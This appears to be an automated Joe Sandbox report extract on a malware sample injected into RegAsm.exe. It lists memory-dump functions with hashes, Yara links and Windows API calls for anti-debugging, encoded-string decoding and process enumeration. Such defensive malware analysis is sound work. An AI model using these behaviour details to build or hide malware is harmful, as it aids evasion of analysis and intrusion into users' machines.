Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624612adf96b25e3f57adebcc8fee9de2e2a93a4869c1df4b2d8cb681f32f7ea
Instruction ID: 9be1dec440fdab091133bee80a933081a6729db643d5981bfcb066802e80e3ad
Opcode Fuzzy Hash: 624612adf96b25e3f57adebcc8fee9de2e2a93a4869c1df4b2d8cb681f32f7ea
Instruction Fuzzy Hash: 97F1E0B15003829FD718DF64C888A2B77B8EF85209F0C473CED588A291E771E555CBA2

Function 192E5940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfefb7411bf851fdbe744abaa37970fec9c1df5685fe8ef04cd45a35a01879a
Instruction ID: fde2ba5fd72fb59c04d55257cbc913aa315e870ae6acf445835f9cdf06e2369a
Opcode Fuzzy Hash: 4bfefb7411bf851fdbe744abaa37970fec9c1df5685fe8ef04cd45a35a01879a
Instruction Fuzzy Hash: BCC127B6E242424FEB00DA18CDD2FDB7791AB92310FEC152EE48587292F225A545C792

Function 192D51D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 192D5264
, xrefs: 192D5334

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: 606678cb47fc520016fdccd017669c5ffed87cefe703efe6c7bb289b5f8dd5ec
Instruction ID: 3d296bc4369453742bc70f2e3abcd9571ed8ad224bd6ad82c987811dbc26d2d1
Opcode Fuzzy Hash: 606678cb47fc520016fdccd017669c5ffed87cefe703efe6c7bb289b5f8dd5ec
Instruction Fuzzy Hash: 75418FB5A00302AFD700DF29CD80F5AB7E9FF88344F594528F988AB251D7B1E955CB92

Function 1930D610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 7549294b3d623cf5169cce16e48ba4900d9bec2935f987b8a87c553478002ebe
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: 5441C3B5600706AFD701DF25CC84A5BB7F8FF45311F884A2CF8A886250E771EA15CBA2

Function 0041A8A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D65A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D66F
UnhandledExceptionFilter.KERNEL32(8d), ref: 0041D67A
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D696
TerminateProcess.KERNEL32(00000000), ref: 0041D69D

Strings

8d, xrefs: 0041D675

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 8d
API String ID: 2579439406-1695097073
Opcode ID: 15e6bdebef7fdcf6b28e9c671bf7be099d11023623272d234c1b96f7451fb0bd
Instruction ID: da8d185630415dce7ae8405e59be5687771a0259bdeb170e3ca3d49ef6a50cc7
Opcode Fuzzy Hash: 15e6bdebef7fdcf6b28e9c671bf7be099d11023623272d234c1b96f7451fb0bd
Instruction Fuzzy Hash: DB2105BC911320EFE750DF55ED856943BA2FB0A308F50202AEB0887761D7B65581CF0E

Function 19244820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d97f41bad217f3b11d88595607dd1ea8d14edf0ee77833b9dad2064a1da7af4d
Instruction ID: b3c0bf5f336d90e7dd13e86630bd830b76da0766e640e630afd150378d5785d6
Opcode Fuzzy Hash: d97f41bad217f3b11d88595607dd1ea8d14edf0ee77833b9dad2064a1da7af4d
Instruction Fuzzy Hash: 1FB1BDB0804746AFD304CF25C880B1BB7F8BF89708F289B19F8599B281E775E554CB92

Function 19245C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 2546ca7a5622dcde12f1a578640ce4b101d80d0f61e9231a043f844c18e05300
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: FC4111B52143029FDB08EF14C884E66B7F0FF88311F384469E8818BA91E762F954CB60

Function 192C9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9e201548957edd98f89b5c0c40f00f685415acef95e3b6930544de01d02c90
Instruction ID: 8cb5ffd850febc44616c11718f8882b452453a593952d8f8e983a33b37e80c51
Opcode Fuzzy Hash: ee9e201548957edd98f89b5c0c40f00f685415acef95e3b6930544de01d02c90
Instruction Fuzzy Hash: 2F31E279710201DFD310CF28D985E66B3F4FF84325B6946B9E9428B2A2D762FD51CB90

Function 004082DE Relevance: 9.1, APIs: 6, Instructions: 83stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408305
lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
memcpy.MSVCRT ref: 00408391
lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
Instruction ID: ccf38daf680dc84ecda820ff8efca09b4dd81ade2d3244571ab64e279443b136
Opcode Fuzzy Hash: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
Instruction Fuzzy Hash: B6217AB190011DEFCB109FA4ED45AEE7BBCFB08744F10047AFA05F2250EB359A459BA5

Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004111C3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
Process32First.KERNEL32(00000000,00000128), ref: 004111F9
Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
String ID:
API String ID: 186290926-0
Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5

Function 192B1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 192B2001

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 54f1c88e6ca7bb3014804a5b37b471c03341a9bf4579e9e0a95c9fb19f277393
Instruction ID: ec6957f132c9472ad5b9630f52d11e368b1efcb39f8d5a6a56bbd78dc6debeab
Opcode Fuzzy Hash: 54f1c88e6ca7bb3014804a5b37b471c03341a9bf4579e9e0a95c9fb19f277393
Instruction Fuzzy Hash: A621E1B5500306BFEB10AF68DD40F5677E9FF25384F589818F846AB161D362F860CBA1

Function 19423300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,19423688,?,00000000), ref: 19423399
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,19423688,?,00000000), ref: 194233C2
GetACP.KERNEL32(?,?,19423688,?,00000000), ref: 194233D7

Strings

ACP, xrefs: 1942331E
OCP, xrefs: 19423354

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8c78b9a28c367fece1926a5bb0fa1f8c7372f79d986870f031b64fb2c6314def
Instruction ID: 7ace75eed8bb074131a65f627d1f7cd0c0da63411a2a8204660b9dae0fab6f4b
Opcode Fuzzy Hash: 8c78b9a28c367fece1926a5bb0fa1f8c7372f79d986870f031b64fb2c6314def
Instruction Fuzzy Hash: 5B219032700147A6E7148F55E905A8B73B6BF44FA0BEE8464E909DB344EF32EB41C7A0

Function 19233AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 1942365A
IsValidCodePage.KERNEL32(00000000), ref: 19423698
IsValidLocale.KERNEL32(?,00000001), ref: 194236AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 194236F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1942370E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 156f9ae308ff496ea2e80210fac85fc59d8738c0f843b4ca35d0fe47b8d826ec
Instruction ID: 7110f16ffe3de40846e708c3c836f66080dd00646702f6d19b60d15ad4e1b7b5
Opcode Fuzzy Hash: 156f9ae308ff496ea2e80210fac85fc59d8738c0f843b4ca35d0fe47b8d826ec
Instruction Fuzzy Hash: E351A7B59002199FDF14DFA5EC80AAEB3B8FF48B40F994579E904E7280E770E645CB60

Function 0040245C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402481
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

Strings

UNK, xrefs: 004024D0

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 307e2a93c1ec34602f4f8329783d4c84d8856f5e9fcd56b171e26a8fa60de6e6
Instruction ID: 3a08a9d548fe4de1239348f4aceeaeed9f578883f8d2c1de915be4d716495e5c
Opcode Fuzzy Hash: 307e2a93c1ec34602f4f8329783d4c84d8856f5e9fcd56b171e26a8fa60de6e6
Instruction Fuzzy Hash: 5B0162F260011C7EE711EB95DE81DFB77ACEB45658F0000ABB704A3181E6F4AE845A78

Function 19232C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 193D48A7
IsDebuggerPresent.KERNEL32 ref: 193D4973
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 193D4993
UnhandledExceptionFilter.KERNEL32(?), ref: 193D499D

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 82978620924232f705a6c67ff4dc8add47806b170c02bb31fd5db6a96e6cf2de
Instruction ID: 5e94f8224ae11e4684d3552f6376a5376eaf39c4b22930402d1b3383dd5ed720
Opcode Fuzzy Hash: 82978620924232f705a6c67ff4dc8add47806b170c02bb31fd5db6a96e6cf2de
Instruction Fuzzy Hash: 2931F4B5D0125C9BDB11DFA4C9897CCBBF8AF08704F5081AAE40DAB290EB719B85CF05

Function 1928EF30 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

